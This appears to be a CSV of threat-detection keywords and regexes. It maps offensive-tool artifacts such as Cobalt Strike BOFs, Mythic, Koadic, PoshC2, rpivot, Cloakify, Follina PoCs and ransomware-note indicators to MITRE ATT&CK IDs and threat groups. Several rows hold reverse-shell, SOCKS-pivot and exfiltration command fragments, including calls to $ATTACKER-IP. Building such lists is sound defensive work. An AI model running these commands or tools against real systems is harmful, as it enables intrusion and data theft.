"*clem9669_wordlist_medium.7z*",".{0,1000}clem9669_wordlist_medium\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","38320"
"*clem9669_wordlist_small.7z*",".{0,1000}clem9669_wordlist_small\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","38321"
"*-cli install github *",".{0,1000}\-cli\sinstall\sgithub\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","38322"
"*-cli install github *Apollo.*",".{0,1000}\-cli\sinstall\sgithub\s.{0,1000}Apollo\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","38323"
"*-cli payload start *",".{0,1000}\-cli\spayload\sstart\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","38324"
"*click_to_exploit.docx*",".{0,1000}click_to_exploit\.docx.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","N/A","1","8","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z","38325"
"*clickjack_attack.html*",".{0,1000}clickjack_attack\.html.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","38326"
"*clickjack_victim.html*",".{0,1000}clickjack_victim\.html.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","38327"
"*clickme*exploit.html*",".{0,1000}clickme.{0,1000}exploit\.html.{0,1000}","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","N/A","2","104","27","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z","38328"
"*client $ATTACKER-IP:$ATTACKER-PORT R:$PORT:socks*",".{0,1000}client\s\$ATTACKER\-IP\:\$ATTACKER\-PORT\sR\:\$PORT\:socks.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38329"
"*client.py --server-ip * --server-port *",".{0,1000}client\.py\s\-\-server\-ip\s.{0,1000}\s\-\-server\-port\s.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","38330"
"*client.py*--domain*--hashes*",".{0,1000}client\.py.{0,1000}\-\-domain.{0,1000}\-\-hashes.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","38331"
"*clientcuworpelkdwecucgvfhp5uz5n7uohsnokndrlhm2zkntyg3had.onion*",".{0,1000}clientcuworpelkdwecucgvfhp5uz5n7uohsnokndrlhm2zkntyg3had\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","38334"
"*ClipboardImplant*",".{0,1000}ClipboardImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","38335"
"*clipboardinject.*",".{0,1000}clipboardinject\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","38336"
"*clipboardinject.x64*",".{0,1000}clipboardinject\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","38337"
"*clipboardinject.x86*",".{0,1000}clipboardinject\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","38338"
"*clipboard-monitor *",".{0,1000}clipboard\-monitor\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","38339"
"*ClipboardWindow-Inject*",".{0,1000}ClipboardWindow\-Inject.{0,1000}","offensive_tool_keyword","cobaltstrike","CLIPBRDWNDCLASS process injection technique(BOF) - execute beacon shellcode in callback","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BronzeTicket/ClipboardWindow-Inject","1","1","N/A","N/A","10","10","68","12","2022-09-15T01:41:39Z","2022-09-14T15:55:06Z","38340"
"*clipmon.sln*",".{0,1000}clipmon\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","38341"
"*Cliws - Lightweight interactive bind/reverse PTY shell*",".{0,1000}Cliws\s\-\sLightweight\sinteractive\sbind\/reverse\sPTY\sshell.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#content","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","38342"
"*cliws -r ws://*",".{0,1000}cliws\s\-r\sws\:\/\/.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","38343"
"*clndh3qilvdv6403g1n0hs3rhd6xpfmjn.oast.online*",".{0,1000}clndh3qilvdv6403g1n0hs3rhd6xpfmjn\.oast\.online.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","38344"
"*cloakify*",".{0,1000}cloakify.{0,1000}","offensive_tool_keyword","cloakify","CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight. Evade DLP/MLS Devices. Social Engineering of Analysts. Defeat Data Whitelisting Controls. Evade AV Detection. Text-based steganography using lists. Convert any file type (e.g. executables. Office. Zip. images) into a list of everyday strings. Very simple tools. powerful concept. limited only by your imagination.","T1001 - T1003 - T1027 - T1036 - T1048 - T1052","TA0010","N/A","N/A","Data Exfiltration","https://github.com/TryCatchHCF/Cloakify","1","0","N/A","N/A","N/A","10","1596","233","2020-11-24T05:25:04Z","2016-05-07T04:52:26Z","38345"
"*CloakNDaggerC2-main*",".{0,1000}CloakNDaggerC2\-main.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","N/A","10","10","17","3","2024-10-09T15:36:46Z","2023-04-28T01:58:18Z","38346"
"*cloc.exe --exclude-dir*",".{0,1000}cloc\.exe\s\-\-exclude\-dir.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","38347"
"*closetrap@aol.com*",".{0,1000}closetrap\@aol\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","38348"
"*Cloud C2 must be run from the command line*",".{0,1000}Cloud\sC2\smust\sbe\srun\sfrom\sthe\scommand\sline.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#content","N/A","10","9","N/A","N/A","N/A","N/A","38349"
"*Cloud C2 will work behind a reverse proxy*",".{0,1000}Cloud\sC2\swill\swork\sbehind\sa\sreverse\sproxy.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#content","N/A","10","9","N/A","N/A","N/A","N/A","38350"
"*cloud_drive_ransomware.py*",".{0,1000}cloud_drive_ransomware\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","38352"
"*cloud_enum-master.zip*",".{0,1000}cloud_enum\-master\.zip.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","N/A","6","10","1794","271","2024-10-10T08:16:59Z","2019-05-31T09:14:05Z","38353"
"*cloudfail.py --target seo.com --tor*",".{0,1000}cloudfail\.py\s\-\-target\sseo\.com\s\-\-tor.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38354"
"*cloudFilterEOP.exe*",".{0,1000}cloudFilterEOP\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38355"
"*Cloudflared and Loclx have started successfully!*",".{0,1000}Cloudflared\sand\sLoclx\shave\sstarted\ssuccessfully!.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","38356"
"*Cloudflared has started successfully!*",".{0,1000}Cloudflared\shas\sstarted\ssuccessfully!.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","38357"
"*cloudmapper collect --account parent --profile parent*",".{0,1000}cloudmapper\scollect\s\-\-account\sparent\s\-\-profile\sparent.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38371"
"*cloudmapper configure add-account --config-file config.json --name parent --id XXX --default true*",".{0,1000}cloudmapper\sconfigure\sadd\-account\s\-\-config\-file\sconfig\.json\s\-\-name\sparent\s\-\-id\sXXX\s\-\-default\strue.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38372"
"*cloudmapper configure discover-organization-accounts*",".{0,1000}cloudmapper\sconfigure\sdiscover\-organization\-accounts.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38373"
"*cloudsplaining create-multi-account-config-file -o accounts.yml*",".{0,1000}cloudsplaining\screate\-multi\-account\-config\-file\s\-o\saccounts\.yml.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38374"
"*cloudsplaining download --profile someprofile*",".{0,1000}cloudsplaining\sdownload\s\-\-profile\ssomeprofile.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38375"
"*cloudsplaining scan --input-file default.json*",".{0,1000}cloudsplaining\sscan\s\-\-input\-file\sdefault\.json.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38376"
"*cloudsplaining scan-multi-account -c accounts.yml -r TargetRole --output-directory ./*",".{0,1000}cloudsplaining\sscan\-multi\-account\s\-c\saccounts\.yml\s\-r\sTargetRole\s\-\-output\-directory\s\.\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38377"
"*cloudsplaining scan-policy-file --input-file examples/policies/wildcards.json*",".{0,1000}cloudsplaining\sscan\-policy\-file\s\-\-input\-file\sexamples\/policies\/wildcards\.json.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38378"
